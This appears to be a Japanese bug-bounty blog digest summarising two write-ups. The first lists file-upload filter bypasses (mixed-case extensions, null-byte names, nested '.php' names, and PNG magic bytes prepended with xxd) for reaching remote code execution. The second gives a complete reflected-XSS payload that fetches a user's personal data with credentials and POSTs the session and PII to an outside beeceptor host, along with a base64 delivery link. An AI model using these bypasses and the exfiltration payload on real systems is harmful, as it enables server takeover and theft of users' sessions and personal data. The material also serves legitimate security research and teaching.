Hello there, ('ω')ノ

RCE へのファイル アップロード バイパスを。

脆弱性：

　無制限のファイルアップロード

　RCE

記事：

　https://sagarsajeev.medium.com/file-upload-bypass-to-rce-76991b47ad8f

今回は、ターゲットのファイル アップロード機能をバイパスして。

RCE にチェーンする方法を。

今回は、３つのバイパス シナリオすべてについて。

シナリオ #1：

拡張子が .php のペイロードは許可されておらず。

ペイロードの名前を「payload.php」から「payload.pHp5」に変更して。

拡張子をランダムな大文字と小文字に変更すると、バイパスされて。

ただし、このようなペイロードは、ターゲットにクライアント側の。

検証のみがある場合にのみ機能することに注意して。

そのため、ペイロードがフロントエンドを通過することがありますが。

IDS またはバックエンド ファイアウォールによってブロックされているため。

コールバックを取得できない場合があって。

シナリオ #2：

拡張子が .php のペイロードは許可されず。

ペイロードの名前を「payload.php」から「payload.php\x00.png」に変更して。

 \x00.png を末尾に追加すると、制限 (Null Byte) が回避され。

右クリック→新しいタブで画像を表示すると、スクリプトがトリガされて。

ノート：

場合によっては .inc 、 .phps 、 .phtml も使用できて。

これを使用する場合は、それに応じて content-Type を変更してするように。

追伸：

保存された XSS もここで可能で。

シナリオ #3：

今回は、有効なバイパスを見つけるのに時間がかかって。

彼らは、画像のみを許可するという厳格なルールを設定していて。

データが実際に画像であるかどうかを対象の Web アプリが。

どのように検証しているかを理解できず。

しかし、多くの調査の結果、ペイロードのマジック バイトをチェックして。

検証していることがわかって。

アプリケーションは、最初の署名バイトに基づいてファイルの種類を。

識別することがあり。

ファイルにそれらを追加/置換するとアプリケーションがだまされる可能性があり。

マジックバイトは、ファイルを認識するために使用されるファイルの。

最初の数バイトに他ならず。

ファイルを開いた場合は表示されないので、ファイルのマジック バイトを。

表示するには、特別な 16 進エディタが必要で。

Linux を使用しているので、組み込みの 16 進エディタと xxd を使用して。

マジック バイトを表示および編集でき。

ただし、任意の 16 進エディタを使用して同じ結果を得ることができて。

 また、バックエンドが特定のキーワードをフィルタリングして。

削除することもわかって。

たとえば、「.php」という用語を削除するとしたら。

ファイルの名前を「payload.p.phphp」に変更すると。

フィルタが「.php」を削除して、ファイル名は「payload.php」になって。

この段階でファイアウォールはバイパスされているため、スクリプトが実行されて。

下記のビデオの１つがこれに役立って。

https://www.youtube.com/c/JohnHammond010

１．89 50 4e 47 0d 0a 1a 0a → png ファイルのマジックバイト

２．echo “89 50 4e 47 0d 0a 1a 0a” | xxd -p -r >> payload.p.phphp

３．スクリプトをアップロードして、本格的な RCE を入手して。

マジック バイトを含む png ファイルを作成するには。

0x89 0x50 0x4E 0x47 0x0D 0x0A 0x1A 0x0A で始まるファイルを作成することだけで。

「xxd」は、ファイルや標準入力から受け取った内容を16進数、または。

2進数でダンプするコマンドで。

さらに16進ダンプから元のデータに復元できて。

Best regards, (^^ゞ

Hello there, ('ω')ノ

アカウントの乗っ取りを達成するために HttpOnly フラグを無効にするを。

脆弱性：

　反射型XSS

　アカウント乗っ取り

記事：

　https://medium.com/@mohamedtarekq/defeat-the-httponly-flag-to-achieve-account-takeover-rxss-c16849d3d192

今回は、反射型 XSS 脆弱性を介してアカウント乗っ取りを達成するために。

HttpOnly フラグが設定されている場合に被害者のセッションを。

取得する方法について説明することに。

プログラムは非公開だったので、target.com と呼ぶことに。

まず、どのようにして XSS を見つけたかを。

メールアドレスの変更機能をテストしていましたが、メールアドレスを変更すると。

次のような URL にリダイレクトされて。

    https://xyz-target.com/authn/email/needverification?e=dGltb29vbkBidWdjcm93ZG5pbmphLmNvbQ==

URL に base64 パラメータ (e) があることに気付いたので、それをデコードすると。

ページに反映されているのは私の新しいメールであることがわかって。

そこで、base64 パラメータ (e) の値を XSS ペイロードに変更し。

base64 でエンコードすることにして。

したがって、下記へアクセスするとCookie でアラートが発生して。

https://xyz-target.com/authn/email/needverification?e=PGltZy9zcmMvb25lcnJvcj1hbGVydChkb2N1bWVudC5jb29raWUpPg==

残念ながら、セッションには HttpOnly フラグが設定されているため。

Java Scriptを介して取得できず。

これまでのところ、重大度が P3 の脆弱性であることはわかっていますが。

通常、JS コードを実行できる場合はここで終わりではなく。

そこで、この脆弱性を ATO にエスカレートし、機密データや CSRF トークンを。

盗むなどの調査をさらに進めて。

アカウント乗っ取りの実現：

最初に行ったことは、ソース コードと JS ファイルを分析して。

ApiKey、シークレット トークン、CSRF トークンなどを探すことで。

次に、LocalStorage に機密データが保存されているかどうかを確認しましたが。

残念ながら重要なものは見つからず。

Burp Suiteを起動して、機密データまたはユーザのセッションを。

返すエンドポイントを探して。

そして、ユーザのセッションを含むユーザの PII 情報を返す興味深いものを。

見つけて。

このエンドポイントは、次の URL のようになり。

　https://api.target.com/home/v1/UserPersonalization/mymodules?more=true

これで、fetch メソッドを使用してこのエンドポイントにリクエストを送信し。

PII 情報に加えて被害者のセッションを盗むことができて。

被害者の Cookie をリクエストとともに送信する fetch メソッドの。

credentials: 'include' 属性に感謝して。

取得リクエスト：

fetch('https://api.target.com/home/v1/UserPersonalization/mymodules?more=true', {
    method: 'get',
    credentials: 'include',
    headers: {
    'Content-Type': 'application/json'
    }
}).then(response => response.text());

今まで、応答の内容を持っていて。

実際、それは大きな応答で。

このデータを攻撃者のサーバに送信する必要があるので。

このデータをサーバに送信するために使用した方法は。

POST XMLHttpRequest を使用することで。

攻撃者のサーバーにデータを送信：

.then(data => {
    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'https://timooon.free.beeceptor.com/data');
    xhr.send(data);
});

最終的なペイロードは次のようになり。

<img src onerror="fetch('https://api.target.com/home/v1/UserPersonalization/mymodules?more=true', {
    method: 'get',
    credentials: 'include',
    headers: {
        'Content-Type': 'application/json'
    }
}).then(response => response.text()).then(data => {
    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'https://timooon.free.beeceptor.com/data');
    xhr.send(data);
});">

最終的なペイロードを base64 にエンコードし、リンクを被害者に配信して。

https://xyz-target.com.com/authn/email/needverification?e=PGltZyBzcmMgb25lcnJvcj0iZmV0Y2goJ2h0dHBzOi8vYXBpLnRhcmdldC5jb20vaG9tZS92MS9Vc2VyUGVyc29uYWxpemF0aW9uL215bW9kdWxlcz9tb3JlPXRydWUnLCB7CiAgICBtZXRob2Q6ICdnZXQnLAogICAgY3JlZGVudGlhbHM6ICdpbmNsdWRlJywKICAgIGhlYWRlcnM6IHsKICAgICAgICAnQ29udGVudC1UeXBlJzogJ2FwcGxpY2F0aW9uL2pzb24nCiAgICB9Cn0pLnRoZW4ocmVzcG9uc2UgPT4gcmVzcG9uc2UudGV4dCgpKS50aGVuKGRhdGEgPT4gewogICAgdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOwogICAgeGhyLm9wZW4oJ1BPU1QnLCAnaHR0cHM6Ly90aW1vb29uLmZyZWUuYmVlY2VwdG9yLmNvbS9kYXRhJyk7CiAgICB4aHIuc2VuZChkYXRhKTsKfSk7Ij4=

そして、被害者のセッションと PII 情報を含む応答がサーバに送信されて。

Best regards, (^^ゞ